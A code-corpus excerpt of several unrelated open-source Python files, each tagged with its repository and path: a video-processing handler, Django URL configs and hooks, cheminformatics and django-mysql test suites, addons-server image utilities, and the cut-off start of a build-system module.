self.log_tree(
logger,
get_objdata_dict(
video_container,
ext_classes_keys=['format', 'layout']
)
)
result = self.handle_video_container(video_container, **kwargs)
return result
# noinspection PyUnusedLocal
@ignore_log_meta
def log_tree(self, logger, value, level=1, **_):
"""
:param logging.Logger logger:
:param Any value:
:param int level:
:param dict _: any options for consecutive methods,
ignores it and pass it through
:return:
"""
space = ' ⇾ ' * level
for key, value in six.iteritems(value):
if isinstance(value, dict):
type_ = value.get('type')
if type_:
key += " [%s]" % str(type_)
name = value.get('name')
if name:
key += " {%s} " % str(name)
long_name = value.get('long_name')
if long_name:
key += " «%s»" % str(long_name)
logger.info("%s %s:" % (space, key))
self.log_tree(logger, value, level=level + 1)
else:
logger.info("%s %s: %s" % (space, key, value))
def handle_video_container(self, video_container, **kwargs):
"""
:param av.container.InputContainer video_container:
input video container, in terms of
av open video file or stream.
:param kwargs: any options for consecutive methods,
ignores it and pass it through.
:return:
"""
assert isinstance(video_container, InputContainer)
packet_seq = self.packets(video_container, **kwargs)
packet_seq = self.filter_packets(packet_seq, **kwargs)
frame_seq = self.frames(packet_seq, **kwargs)
filtered_seq = self.filter_frames(frame_seq, **kwargs)
handled_seq = self.handle_frames(filtered_seq, **kwargs)
list(handled_seq)
return None
@staticmethod
def packets(video_container, stream_seq=None, **_):
"""
:param av.container.InputContainer video_container:
:param stream_seq:
:param _:
:return:
"""
if stream_seq:
stream_seq = tuple(stream_seq)
return video_container.demux(streams=stream_seq)
@should_be_overloaded
def filter_packets(self, packet_seq, **_):
"""
:param collections.Iterable packet_seq:
:param dict _: ignores it.
:return:
"""
return packet_seq
@staticmethod
def packet_frame_seqs(packet_seq, **_):
"""
:param collections.Iterable packet_seq:
:param dict _: ignores it.
:return:
"""
for packet in packet_seq:
decoded = packet.decode()
yield iter(decoded)
def frames(self, packet_seq, **kwargs):
"""
:param collections.Iterable packet_seq:
:param dict kwargs: any options for consecutive methods,
ignores it and pass it through.
:return:
"""
packet_frame_seqs = self.packet_frame_seqs(packet_seq, **kwargs)
global_number = 0
for packet_number, frame_seq in enumerate(packet_frame_seqs):
for frame_number, source_frame in enumerate(frame_seq):
position = FramePosition(
global_number=global_number,
frame_number=frame_number,
packet_number=packet_number,
)
frame = self.frame(
source=source_frame,
position=position,
)
yield frame
global_number += 1
def frame(self, source=None, position=None):
"""
:param source:
:param position:
:return:
"""
frame = BaseFrame(
av_frame=source,
position=position,
)
return frame
@should_be_overloaded
def filter_frames(self, frame_seq, **_):
"""
:param collections.Iterable frame_seq:
:param dict _: ignores it.
:return:
"""
return frame_seq
@should_be_overloaded
def handle_frames(self, frame_seq, **_):
"""
:param collections.Iterable frame_seq:
:param dict _: ignores it..
:return:
"""
return frame_seq
@staticmethod
def limit_seq(sequence, first=0, last=10, as_stream=False, **_):
"""
:param sequence:
:param float first:
:param float last:
:param bool as_stream:
:param _:
:return:
"""
at_start = None
for unit in sequence:
BaseHandler.__logger.debug('unit = %s', unit)
current = float(unit.time)
if as_stream:
if at_start is None:
at_start = current
current = current - at_start
if last <= current:
sequence.close()
if first <= current:
yield unit
def log_seq(self,
sequence,
fmt="[{delta_time}] {item}",
logger=None,
log=None,
**kwargs):
"""
Prints sequence item by item
:param sequence:
:param fmt:
:param logger:
:param log:
:param kwargs:
:return:
"""
start_time = datetime.datetime.now()
if logger is None:
logger = logging.getLogger(__name__)
if log is None:
log = logger.info
if fmt is None:
fmt = "WRONG FORMAT …"
for item in sequence:
now_time = datetime.datetime.now()
delta_time = now_time - start_time
item_dict = kwargs
for attr in dir(item):
if not attr.startswith('__'):
item_dict['item.{}'.format(attr)] \
= getattr(item, attr)
log(fmt.format(
delta_time=delta_time,
self=self,
item=item,
**item_dict
))
yield item
| w495/python-video-shot-detector | shot_detector/handlers/base_handler.py | Python | bsd-3-clause | 8,236 |
from django.conf.urls import patterns, include, url
# Uncomment the next two lines to enable the admin:
# from django.contrib import admin
# admin.autodiscover()
urlpatterns = patterns('',
# Examples:
url(r'^$', 'formsfive.views.example', name='example'),
)
| iamjstates/django-formsfive | urls.py | Python | bsd-3-clause | 268 |
import os
from tempfile import NamedTemporaryFile
from numpy.testing import assert_array_equal
import pandas as pd
import oddt
import oddt.pandas as opd
test_data_dir = os.path.dirname(os.path.abspath(__file__))
input_fname = os.path.join(test_data_dir, 'data/dude/xiap/actives_docked.sdf')
def test_classes():
""" Test oddt.pandas classes behavior """
df = opd.read_sdf(input_fname)
# Check classes inheritance
assert isinstance(df, opd.ChemDataFrame)
assert isinstance(df, pd.DataFrame)
assert isinstance(df['mol'], opd.ChemSeries)
assert isinstance(df['mol'], pd.Series)
assert isinstance(df, pd.DataFrame)
# Check custom metadata
assert hasattr(df, '_molecule_column')
assert hasattr(df[['mol']], '_molecule_column')
assert df._molecule_column == df[['mol']]._molecule_column
# Check if slicing perserve classes
assert isinstance(df.head(1), opd.ChemDataFrame)
assert isinstance(df['mol'].head(1), opd.ChemSeries)
def test_reading():
""" Test reading molecule files to ChemDataFrame """
df = opd.read_sdf(input_fname)
# Check dimensions
assert len(df) == 100
assert len(df.columns) == 15
df = opd.read_sdf(input_fname, smiles_column='smi_col')
assert 'smi_col' in df.columns
df = opd.read_sdf(input_fname,
molecule_column=None,
molecule_name_column=None,
usecols=['name'])
assert 'mol' not in df.columns
assert 'mol_name' not in df.columns
assert len(df.columns) == 1
df = opd.read_sdf(input_fname,
usecols=['name', 'uniprot_id', 'act'])
assert len(df.columns) == 5 # 3 from use_cols + 1 'mol' + 1 'mol_name'
assert 'uniprot_id' in df.columns
assert 'smi_col' not in df.columns
# Chunk reading
chunks = []
for chunk in opd.read_sdf(input_fname, chunksize=10):
assert len(chunk) == 10
chunks.append(chunk)
assert len(chunks) == 10
df = pd.concat(chunks)
# Check dimensions
assert len(df) == 100
def test_substruct_sim_search():
df = opd.read_sdf(input_fname).head(10)
query = oddt.toolkit.readstring('smi', 'C(=O)(N1C[C@H](C[C@H]1C(=O)N[C@@H]1CCCc2c1cccc2)Oc1ccccc1)[C@@H](NC(=O)[C@H](C)NC)C1CCCCC1')
ge_answear = [True, True, True, False, True, False, False, False, False, False]
assert (df.mol >= query).tolist() == ge_answear
assert (query <= df.mol).tolist() == ge_answear
le_answear = [True, True, True, True, True, True, False, False, False, True]
assert (df.mol <= query).tolist() == le_answear
assert (query >= df.mol).tolist() == le_answear
sim = df.mol.calcfp() | query.calcfp()
assert sim.dtype == 'float64'
def test_mol2():
"""Writing and reading of mol2 fils to/from ChemDataFrame"""
if oddt.toolkit.backend == 'ob':
df = opd.read_sdf(input_fname)
with NamedTemporaryFile(suffix='.mol2') as f:
df.to_mol2(f.name)
df2 = opd.read_mol2(f.name)
assert df.shape == df2.shape
chunks = []
for chunk in opd.read_mol2(f.name, chunksize=10):
assert len(chunk) == 10
chunks.append(chunk)
df3 = pd.concat(chunks)
assert df.shape == df3.shape
with NamedTemporaryFile(suffix='.mol2') as f:
df.to_mol2(f.name, columns=['name', 'uniprot_id', 'act'])
df2 = opd.read_mol2(f.name)
assert len(df2.columns) == 5
def test_sdf():
"""Writing ChemDataFrame to SDF molecular files"""
df = opd.read_sdf(input_fname)
with NamedTemporaryFile(suffix='.sdf') as f:
df.to_sdf(f.name)
df2 = opd.read_sdf(f.name)
assert_array_equal(df.columns.sort_values(), df2.columns.sort_values())
with NamedTemporaryFile(suffix='.sdf') as f:
df.to_sdf(f.name, columns=['name', 'uniprot_id', 'act'])
df2 = opd.read_sdf(f.name)
assert len(df2.columns) == 5
def test_csv():
df = opd.read_sdf(input_fname,
columns=['mol', 'name', 'chembl_id', 'dude_smiles', 'act'])
df['act'] = df['act'].astype(float)
df['name'] = df['name'].astype(int)
with NamedTemporaryFile(suffix='.csv', mode='w+') as f:
for str_buff in (f, f.name):
df.to_csv(str_buff, index=False)
f.seek(0)
df2 = opd.read_csv(f.name, smiles_to_molecule='mol',
molecule_column='mol')
assert df.shape == df2.shape
assert df.columns.tolist() == df2.columns.tolist()
assert df.dtypes.tolist() == df2.dtypes.tolist()
with NamedTemporaryFile(suffix='.csv', mode='w+') as f:
for str_buff in (f, f.name):
df.to_csv(str_buff, index=False, columns=['name', 'act'])
f.seek(0)
df2 = pd.read_csv(f.name)
assert df[['name', 'act']].shape == df2.shape
assert df[['name', 'act']].columns.tolist() == df2.columns.tolist()
assert df[['name', 'act']].dtypes.tolist() == df2.dtypes.tolist()
def test_excel():
# just check if it doesn't fail
df = opd.read_sdf(input_fname,
columns=['mol', 'name', 'chembl_id', 'dude_smiles', 'act'])
df = df.head(10) # it's slow so use first 10 mols
df['act'] = df['act'].astype(float)
df['name'] = df['name'].astype(int)
with NamedTemporaryFile(suffix='.xls', mode='w') as f:
df.to_excel(f.name, index=False)
writer = pd.ExcelWriter(f.name, engine='xlsxwriter')
df.to_excel(writer, index=False)
def test_chemseries_writers():
df = opd.read_sdf(input_fname,
columns=['mol', 'name', 'chembl_id', 'dude_smiles', 'act'])
mols = df['mol']
# SMILES
with NamedTemporaryFile(suffix='.ism', mode='w') as f:
mols.to_smiles(f)
for mol in oddt.toolkit.readfile('smi', f.name):
assert isinstance(mol, oddt.toolkit.Molecule)
# SDF
with NamedTemporaryFile(suffix='.sdf', mode='w') as f:
mols.to_sdf(f)
for mol in oddt.toolkit.readfile('sdf', f.name):
assert isinstance(mol, oddt.toolkit.Molecule)
# mol2
if oddt.toolkit.backend == 'ob':
with NamedTemporaryFile(suffix='.mol2', mode='w') as f:
mols.to_mol2(f)
for mol in oddt.toolkit.readfile('mol2', f.name):
assert isinstance(mol, oddt.toolkit.Molecule)
def test_ipython():
"""iPython Notebook molecule rendering in SVG"""
df = opd.read_sdf(input_fname)
# mock ipython
oddt.toolkit.ipython_notebook = True
# png
oddt.toolkit.image_backend = 'png'
html = df.head(1).to_html()
assert '<img src="data:image/png;base64,' in html
# svg
oddt.toolkit.image_backend = 'svg'
html = df.head(1).to_html()
assert '<svg' in html
oddt.toolkit.ipython_notebook = False
| oddt/oddt | tests/test_pandas.py | Python | bsd-3-clause | 6,915 |
from django.conf import settings
from django.conf.urls import url
from django.contrib.staticfiles.templatetags.staticfiles import static
from django.utils.html import format_html, format_html_join
from wagtail.wagtailcore import hooks
from .views import get_full_image_url
@hooks.register('register_admin_urls')
def register_admin_urls():
return [
url(r'^full_image/(\d+)/$', get_full_image_url),
]
@hooks.register('insert_editor_css')
def editor_css():
return format_html(
'<link rel="stylesheet" href="{}">',
static('annotated-image/annotated-image.css')
)
@hooks.register('insert_editor_js')
def editor_js():
js_files = [
'annotated-image/annotated-image-handler.js',
'annotated-image/jquery.annotate.js',
]
return format_html_join('\n', '<script src="{0}{1}"></script>',
((settings.STATIC_URL, filename) for filename in js_files)
)
| takeflight/wagtailannotatedimage | wagtailannotatedimage/wagtail_hooks.py | Python | bsd-3-clause | 923 |
from django.conf.urls.defaults import *
import price_tracker.views
from django.contrib import admin
admin.autodiscover()
handler500 = 'djangotoolbox.errorviews.server_error'
urlpatterns = patterns(
'',
(r'^admin/', include(admin.site.urls)),
(r'results', price_tracker.views.results),
(r'^$', price_tracker.views.index),
('aboutus', 'django.views.generic.simple.direct_to_template',
{'template': 'price_tracker/aboutus.html'}),
)
| vinayan3/clpricehistory | urls.py | Python | bsd-3-clause | 458 |
import os
import StringIO
import subprocess
import tempfile
from base64 import b64encode
from django.conf import settings
from django.core.files.storage import default_storage as storage
from PIL import Image
import olympia.core.logger
log = olympia.core.logger.getLogger('z.versions.utils')
def write_svg_to_png(svg_content, out):
# when settings.DEBUG is on (i.e. locally) don't delete the svgs.
tmp_args = {
'dir': settings.TMP_PATH, 'mode': 'wb', 'suffix': '.svg',
'delete': not settings.DEBUG}
with tempfile.NamedTemporaryFile(**tmp_args) as temporary_svg:
temporary_svg.write(svg_content)
temporary_svg.flush()
try:
if not os.path.exists(os.path.dirname(out)):
os.makedirs(out)
command = [
settings.RSVG_CONVERT_BIN,
'--output', out,
temporary_svg.name,
]
subprocess.check_call(command)
except IOError as io_error:
log.debug(io_error)
return False
except subprocess.CalledProcessError as process_error:
log.debug(process_error)
return False
return True
def encode_header_image(path):
try:
with storage.open(path, 'rb') as image:
header_blob = image.read()
with Image.open(StringIO.StringIO(header_blob)) as header_image:
(width, height) = header_image.size
src = 'data:image/%s;base64,%s' % (
header_image.format.lower(), b64encode(header_blob))
except IOError as io_error:
log.debug(io_error)
return (None, 0, 0)
return (src, width, height)
class AdditionalBackground(object):
@classmethod
def split_alignment(cls, alignment):
alignments = alignment.split()
# e.g. "center top"
if len(alignments) >= 2:
return (alignments[0], alignments[1])
elif len(alignments) == 1:
# e.g. "left", which is the same as 'left center'
if alignments[0] in ['left', 'right']:
return (alignments[0], 'center')
# e.g. "top", which is the same as 'center top'
else:
return ('center', alignments[0])
else:
return ('', '')
def __init__(self, path, alignment, tiling, header_root):
# If there an unequal number of alignments or tiling to srcs the value
# will be None so use defaults.
self.alignment = (alignment or 'right top').lower()
self.tiling = (tiling or 'no-repeat').lower()
self.src, self.width, self.height = encode_header_image(
os.path.join(header_root, path))
def calculate_pattern_offsets(self, svg_width, svg_height):
align_x, align_y = self.split_alignment(self.alignment)
if align_x == 'right':
self.pattern_x = svg_width - self.width
elif align_x == 'center':
self.pattern_x = (svg_width - self.width) / 2
else:
self.pattern_x = 0
if align_y == 'bottom':
self.pattern_y = svg_height - self.height
elif align_y == 'center':
self.pattern_y = (svg_height - self.height) / 2
else:
self.pattern_y = 0
if self.tiling in ['repeat', 'repeat-x'] or self.width > svg_width:
self.pattern_width = self.width
else:
self.pattern_width = svg_width
if self.tiling in ['repeat', 'repeat-y'] or self.height > svg_height:
self.pattern_height = self.height
else:
self.pattern_height = svg_height
CHROME_COLOR_TO_CSS = {
'bookmark_text': 'toolbar_text',
'frame': 'accentcolor',
'frame_inactive': 'accentcolor',
'tab_background_text': 'textcolor',
}
def process_color_value(prop, value):
prop = CHROME_COLOR_TO_CSS.get(prop, prop)
if isinstance(value, list) and len(value) == 3:
return prop, u'rgb(%s,%s,%s)' % tuple(value)
# strip out spaces because jquery.minicolors chokes on them
return prop, unicode(value).replace(' ', '')
| atiqueahmedziad/addons-server | src/olympia/versions/utils.py | Python | bsd-3-clause | 4,124 |
import json
import re
import pytest
from django import forms
from django.core import exceptions, serializers
from django.core.management import call_command
from django.db import connection, models
from django.db.migrations.writer import MigrationWriter
from django.db.models import Q
from django.test import SimpleTestCase, TestCase, TransactionTestCase, override_settings
from django_mysql.forms import SimpleListField
from django_mysql.models import ListCharField, ListF
from django_mysql.test.utils import override_mysql_variables
from tests.testapp.models import (
CharListDefaultModel,
CharListModel,
IntListModel,
TemporaryModel,
)
class TestSaveLoad(TestCase):
def test_char_easy(self):
s = CharListModel.objects.create(field=["comfy", "big"])
assert s.field == ["comfy", "big"]
s = CharListModel.objects.get(id=s.id)
assert s.field == ["comfy", "big"]
s.field.append("round")
s.save()
assert s.field == ["comfy", "big", "round"]
s = CharListModel.objects.get(id=s.id)
assert s.field == ["comfy", "big", "round"]
def test_char_string_direct(self):
s = CharListModel.objects.create(field="big,bad")
s = CharListModel.objects.get(id=s.id)
assert s.field == ["big", "bad"]
def test_is_a_list_immediately(self):
s = CharListModel()
assert s.field == []
s.field.append("bold")
s.field.append("brave")
s.save()
assert s.field == ["bold", "brave"]
s = CharListModel.objects.get(id=s.id)
assert s.field == ["bold", "brave"]
def test_empty(self):
s = CharListModel.objects.create()
assert s.field == []
s = CharListModel.objects.get(id=s.id)
assert s.field == []
def test_char_cant_create_lists_with_empty_string(self):
with pytest.raises(ValueError):
CharListModel.objects.create(field=[""])
def test_char_cant_create_sets_with_commas(self):
with pytest.raises(ValueError):
CharListModel.objects.create(field=["co,mma", "contained"])
def test_char_basic_lookup(self):
mymodel = CharListModel.objects.create()
empty = CharListModel.objects.filter(field="")
assert empty.count() == 1
assert empty[0] == mymodel
mymodel.delete()
assert empty.count() == 0
def test_char_lookup_contains(self):
self.check_char_lookup("contains")
def test_char_lookup_icontains(self):
self.check_char_lookup("icontains")
def check_char_lookup(self, lookup):
lname = "field__" + lookup
mymodel = CharListModel.objects.create(field=["mouldy", "rotten"])
mouldy = CharListModel.objects.filter(**{lname: "mouldy"})
assert mouldy.count() == 1
assert mouldy[0] == mymodel
rotten = CharListModel.objects.filter(**{lname: "rotten"})
assert rotten.count() == 1
assert rotten[0] == mymodel
clean = CharListModel.objects.filter(**{lname: "clean"})
assert clean.count() == 0
with pytest.raises(ValueError):
list(CharListModel.objects.filter(**{lname: ["a", "b"]}))
both = CharListModel.objects.filter(
Q(**{lname: "mouldy"}) & Q(**{lname: "rotten"})
)
assert both.count() == 1
assert both[0] == mymodel
either = CharListModel.objects.filter(
Q(**{lname: "mouldy"}) | Q(**{lname: "clean"})
)
assert either.count() == 1
not_clean = CharListModel.objects.exclude(**{lname: "clean"})
assert not_clean.count() == 1
not_mouldy = CharListModel.objects.exclude(**{lname: "mouldy"})
assert not_mouldy.count() == 0
def test_char_len_lookup_empty(self):
mymodel = CharListModel.objects.create(field=[])
empty = CharListModel.objects.filter(field__len=0)
assert empty.count() == 1
assert empty[0] == mymodel
one = CharListModel.objects.filter(field__len=1)
assert one.count() == 0
one_or_more = CharListModel.objects.filter(field__len__gte=0)
assert one_or_more.count() == 1
def test_char_len_lookup(self):
mymodel = CharListModel.objects.create(field=["red", "expensive"])
empty = CharListModel.objects.filter(field__len=0)
assert empty.count() == 0
one_or_more = CharListModel.objects.filter(field__len__gte=1)
assert one_or_more.count() == 1
assert one_or_more[0] == mymodel
two = CharListModel.objects.filter(field__len=2)
assert two.count() == 1
assert two[0] == mymodel
three = CharListModel.objects.filter(field__len=3)
assert three.count() == 0
def test_char_default(self):
mymodel = CharListDefaultModel.objects.create()
assert mymodel.field == ["a", "d"]
mymodel = CharListDefaultModel.objects.get(id=mymodel.id)
assert mymodel.field == ["a", "d"]
def test_char_position_lookup(self):
mymodel = CharListModel.objects.create(field=["red", "blue"])
blue0 = CharListModel.objects.filter(field__0="blue")
assert blue0.count() == 0
red0 = CharListModel.objects.filter(field__0="red")
assert list(red0) == [mymodel]
red0_red1 = CharListModel.objects.filter(field__0="red", field__1="red")
assert red0_red1.count() == 0
red0_blue1 = CharListModel.objects.filter(field__0="red", field__1="blue")
assert list(red0_blue1) == [mymodel]
red0_or_blue0 = CharListModel.objects.filter(
Q(field__0="red") | Q(field__0="blue")
)
assert list(red0_or_blue0) == [mymodel]
def test_char_position_lookup_repeat_fails(self):
"""
FIND_IN_SET returns the *first* position so repeats are not dealt with
"""
CharListModel.objects.create(field=["red", "red", "blue"])
red1 = CharListModel.objects.filter(field__1="red")
assert list(red1) == [] # should be 'red'
def test_char_position_lookup_too_long(self):
CharListModel.objects.create(field=["red", "blue"])
red1 = CharListModel.objects.filter(field__2="blue")
assert list(red1) == []
def test_int_easy(self):
mymodel = IntListModel.objects.create(field=[1, 2])
assert mymodel.field == [1, 2]
mymodel = IntListModel.objects.get(id=mymodel.id)
assert mymodel.field == [1, 2]
def test_int_contains_lookup(self):
onetwo = IntListModel.objects.create(field=[1, 2])
ones = IntListModel.objects.filter(field__contains=1)
assert ones.count() == 1
assert ones[0] == onetwo
twos = IntListModel.objects.filter(field__contains=2)
assert twos.count() == 1
assert twos[0] == onetwo
threes = IntListModel.objects.filter(field__contains=3)
assert threes.count() == 0
with pytest.raises(ValueError):
list(IntListModel.objects.filter(field__contains=[1, 2]))
ones_and_twos = IntListModel.objects.filter(
Q(field__contains=1) & Q(field__contains=2)
)
assert ones_and_twos.count() == 1
assert ones_and_twos[0] == onetwo
ones_and_threes = IntListModel.objects.filter(
Q(field__contains=1) & Q(field__contains=3)
)
assert ones_and_threes.count() == 0
ones_or_threes = IntListModel.objects.filter(
Q(field__contains=1) | Q(field__contains=3)
)
assert ones_or_threes.count() == 1
no_three = IntListModel.objects.exclude(field__contains=3)
assert no_three.count() == 1
no_one = IntListModel.objects.exclude(field__contains=1)
assert no_one.count() == 0
def test_int_position_lookup(self):
onetwo = IntListModel.objects.create(field=[1, 2])
one0 = IntListModel.objects.filter(field__0=1)
assert list(one0) == [onetwo]
two0 = IntListModel.objects.filter(field__0=2)
assert two0.count() == 0
one0two1 = IntListModel.objects.filter(field__0=1, field__1=2)
assert list(one0two1) == [onetwo]
class TestListF(TestCase):
def test_append_to_none(self):
CharListModel.objects.create(field=[])
CharListModel.objects.update(field=ListF("field").append("first"))
model = CharListModel.objects.get()
assert model.field == ["first"]
def test_append_to_one(self):
CharListModel.objects.create(field=["big"])
CharListModel.objects.update(field=ListF("field").append("bad"))
model = CharListModel.objects.get()
assert model.field == ["big", "bad"]
def test_append_to_some(self):
CharListModel.objects.create(field=["big", "blue"])
CharListModel.objects.update(field=ListF("field").append("round"))
model = CharListModel.objects.get()
assert model.field == ["big", "blue", "round"]
def test_append_to_multiple_objects(self):
CharListModel.objects.create(field=["mouse"])
CharListModel.objects.create(field=["keyboard"])
CharListModel.objects.update(field=ListF("field").append("screen"))
first, second = tuple(CharListModel.objects.all())
assert first.field == ["mouse", "screen"]
assert second.field == ["keyboard", "screen"]
def test_append_exists(self):
CharListModel.objects.create(field=["nice"])
CharListModel.objects.update(field=ListF("field").append("nice"))
model = CharListModel.objects.get()
assert model.field == ["nice", "nice"]
@override_mysql_variables(SQL_MODE="ANSI")
def test_append_works_in_ansi_mode(self):
CharListModel.objects.create()
CharListModel.objects.update(field=ListF("field").append("big"))
CharListModel.objects.update(field=ListF("field").append("bad"))
model = CharListModel.objects.get()
assert model.field == ["big", "bad"]
def test_append_assignment(self):
model = CharListModel.objects.create(field=["red"])
model.field = ListF("field").append("blue")
model.save()
model = CharListModel.objects.get()
assert model.field == ["red", "blue"]
def test_appendleft_to_none(self):
CharListModel.objects.create(field=[])
CharListModel.objects.update(field=ListF("field").appendleft("first"))
model = CharListModel.objects.get()
assert model.field == ["first"]
def test_appendleft_to_one(self):
CharListModel.objects.create(field=["big"])
CharListModel.objects.update(field=ListF("field").appendleft("bad"))
model = CharListModel.objects.get()
assert model.field == ["bad", "big"]
def test_appendleft_to_some(self):
CharListModel.objects.create(field=["big", "blue"])
CharListModel.objects.update(field=ListF("field").appendleft("round"))
model = CharListModel.objects.get()
assert model.field == ["round", "big", "blue"]
def test_appendleft_to_multiple_objects(self):
CharListModel.objects.create(field=["mouse"])
CharListModel.objects.create(field=["keyboard"])
CharListModel.objects.update(field=ListF("field").appendleft("screen"))
first, second = tuple(CharListModel.objects.all())
assert first.field == ["screen", "mouse"]
assert second.field == ["screen", "keyboard"]
def test_appendleft_exists(self):
CharListModel.objects.create(field=["nice"])
CharListModel.objects.update(field=ListF("field").appendleft("nice"))
model = CharListModel.objects.get()
assert model.field == ["nice", "nice"]
@override_mysql_variables(SQL_MODE="ANSI")
def test_appendleft_works_in_ansi_mode(self):
CharListModel.objects.create()
CharListModel.objects.update(field=ListF("field").appendleft("big"))
CharListModel.objects.update(field=ListF("field").appendleft("bad"))
model = CharListModel.objects.get()
assert model.field == ["bad", "big"]
def test_appendleft_assignment(self):
model = CharListModel.objects.create(field=["red"])
model.field = ListF("field").appendleft("blue")
model.save()
model = CharListModel.objects.get()
assert model.field == ["blue", "red"]
def test_pop_none(self):
CharListModel.objects.create(field=[])
CharListModel.objects.update(field=ListF("field").pop())
model = CharListModel.objects.get()
assert model.field == []
def test_pop_one(self):
CharListModel.objects.create(field=["red"])
CharListModel.objects.update(field=ListF("field").pop())
model = CharListModel.objects.get()
assert model.field == []
def test_pop_two(self):
CharListModel.objects.create(field=["red", "blue"])
CharListModel.objects.update(field=ListF("field").pop())
model = CharListModel.objects.get()
assert model.field == ["red"]
def test_pop_three(self):
CharListModel.objects.create(field=["green", "yellow", "p"])
CharListModel.objects.update(field=ListF("field").pop())
model = CharListModel.objects.get()
assert model.field == ["green", "yellow"]
def test_popleft_none(self):
CharListModel.objects.create(field=[])
CharListModel.objects.update(field=ListF("field").popleft())
model = CharListModel.objects.get()
assert model.field == []
def test_popleft_one(self):
CharListModel.objects.create(field=["red"])
CharListModel.objects.update(field=ListF("field").popleft())
model = CharListModel.objects.get()
assert model.field == []
def test_popleft_two(self):
CharListModel.objects.create(field=["red", "blue"])
CharListModel.objects.update(field=ListF("field").popleft())
model = CharListModel.objects.get()
assert model.field == ["blue"]
def test_popleft_three(self):
CharListModel.objects.create(field=["green", "yellow", "p"])
CharListModel.objects.update(field=ListF("field").popleft())
model = CharListModel.objects.get()
assert model.field == ["yellow", "p"]
class TestValidation(SimpleTestCase):
def test_max_length(self):
field = ListCharField(models.CharField(max_length=32), size=3, max_length=32)
field.clean({"a", "b", "c"}, None)
with pytest.raises(exceptions.ValidationError) as excinfo:
field.clean({"a", "b", "c", "d"}, None)
assert (
excinfo.value.messages[0]
== "List contains 4 items, it should contain no more than 3."
)
class TestCheck(SimpleTestCase):
def test_field_checks(self):
class InvalidListCharModel1(TemporaryModel):
field = ListCharField(models.CharField(), max_length=32)
errors = InvalidListCharModel1.check(actually_check=True)
assert len(errors) == 1
assert errors[0].id == "django_mysql.E004"
assert "Base field for list has errors" in errors[0].msg
assert "max_length" in errors[0].msg
def test_invalid_base_fields(self):
class InvalidListCharModel2(TemporaryModel):
field = ListCharField(
models.ForeignKey("testapp.Author", on_delete=models.CASCADE),
max_length=32,
)
errors = InvalidListCharModel2.check(actually_check=True)
assert len(errors) == 1
assert errors[0].id == "django_mysql.E005"
assert "Base field for list must be" in errors[0].msg
def test_max_length_including_base(self):
class InvalidListCharModel3(TemporaryModel):
field = ListCharField(
models.CharField(max_length=32), size=2, max_length=32
)
errors = InvalidListCharModel3.check(actually_check=True)
assert len(errors) == 1
assert errors[0].id == "django_mysql.E006"
assert "Field can overrun" in errors[0].msg
def test_max_length_missing_doesnt_crash(self):
class InvalidListCharModel4(TemporaryModel):
field = ListCharField(models.CharField(max_length=2), size=2)
errors = InvalidListCharModel4.check(actually_check=True)
assert len(errors) == 1
assert errors[0].id == "fields.E120"
assert errors[0].msg == "CharFields must define a 'max_length' attribute."
class TestDeconstruct(TestCase):
def test_deconstruct(self):
field = ListCharField(models.IntegerField(), max_length=32)
name, path, args, kwargs = field.deconstruct()
new = ListCharField(*args, **kwargs)
assert new.base_field.__class__ == field.base_field.__class__
def test_deconstruct_with_size(self):
field = ListCharField(models.IntegerField(), size=3, max_length=32)
name, path, args, kwargs = field.deconstruct()
new = ListCharField(*args, **kwargs)
assert new.size == field.size
def test_deconstruct_args(self):
field = ListCharField(models.CharField(max_length=5), max_length=32)
name, path, args, kwargs = field.deconstruct()
new = ListCharField(*args, **kwargs)
assert new.base_field.max_length == field.base_field.max_length
class TestMigrationWriter(TestCase):
def test_makemigrations(self):
field = ListCharField(models.CharField(max_length=5), max_length=32)
statement, imports = MigrationWriter.serialize(field)
# The order of the output max_length/size statements varies by
# python version, hence a little regexp to match them
assert re.compile(
r"""^django_mysql\.models\.ListCharField\(
models\.CharField\(max_length=5\),\ # space here
(
max_length=32,\ size=None|
size=None,\ max_length=32
)
\)$
""",
re.VERBOSE,
).match(statement)
def test_makemigrations_with_size(self):
field = ListCharField(models.CharField(max_length=5), max_length=32, size=5)
statement, imports = MigrationWriter.serialize(field)
# The order of the output max_length/size statements varies by
# python version, hence a little regexp to match them
assert re.compile(
r"""^django_mysql\.models\.ListCharField\(
models\.CharField\(max_length=5\),\ # space here
(
max_length=32,\ size=5|
size=5,\ max_length=32
)
\)$
""",
re.VERBOSE,
).match(statement)
class TestMigrations(TransactionTestCase):
@override_settings(
MIGRATION_MODULES={"testapp": "tests.testapp.list_default_migrations"}
)
def test_adding_field_with_default(self):
table_name = "testapp_intlistdefaultmodel"
table_names = connection.introspection.table_names
with connection.cursor() as cursor:
assert table_name not in table_names(cursor)
call_command(
"migrate", "testapp", verbosity=0, skip_checks=True, interactive=False
)
with connection.cursor() as cursor:
assert table_name in table_names(cursor)
call_command(
"migrate",
"testapp",
"zero",
verbosity=0,
skip_checks=True,
interactive=False,
)
with connection.cursor() as cursor:
assert table_name not in table_names(cursor)
class TestSerialization(SimpleTestCase):
def test_dumping(self):
instance = CharListModel(field=["big", "comfy"])
data = json.loads(serializers.serialize("json", [instance]))[0]
field = data["fields"]["field"]
assert sorted(field.split(",")) == ["big", "comfy"]
def test_loading(self):
test_data = """
[{"fields": {"field": "big,leather,comfy"},
"model": "testapp.CharListModel", "pk": null}]
"""
objs = list(serializers.deserialize("json", test_data))
instance = objs[0].object
assert instance.field == ["big", "leather", "comfy"]
class TestDescription(SimpleTestCase):
def test_char(self):
field = ListCharField(models.CharField(max_length=5), max_length=32)
assert field.description == "List of String (up to %(max_length)s)"
def test_int(self):
field = ListCharField(models.IntegerField(), max_length=32)
assert field.description == "List of Integer"
class TestFormField(SimpleTestCase):
def test_model_field_formfield(self):
model_field = ListCharField(models.CharField(max_length=27))
form_field = model_field.formfield()
assert isinstance(form_field, SimpleListField)
assert isinstance(form_field.base_field, forms.CharField)
assert form_field.base_field.max_length == 27
def test_model_field_formfield_size(self):
model_field = ListCharField(models.IntegerField(), size=4)
form_field = model_field.formfield()
assert isinstance(form_field, SimpleListField)
assert form_field.max_length == 4
| arnau126/django-mysql | tests/testapp/test_listcharfield.py | Python | bsd-3-clause | 21,270 |
# Copyright (c) 2011 Tencent Inc.
# All rights reserved.
#
# Author: Michaelpeng <[email protected]>
# Date: October 20, 2011
"""
This is the cc_target module which is the super class
of all of the scons cc targets, like cc_library, cc_binary.
"""
import os
import subprocess
import Queue
import blade
import configparse
import console
import build_rules
from blade_util import var_to_list, stable_unique
from target import Target
class CcTarget(Target):
"""A scons cc target subclass.
This class is derived from SconsTarget and it is the base class
of cc_library, cc_binary etc.
"""
def __init__(self,
name,
target_type,
srcs,
deps,
visibility,
warning,
defs,
incs,
export_incs,
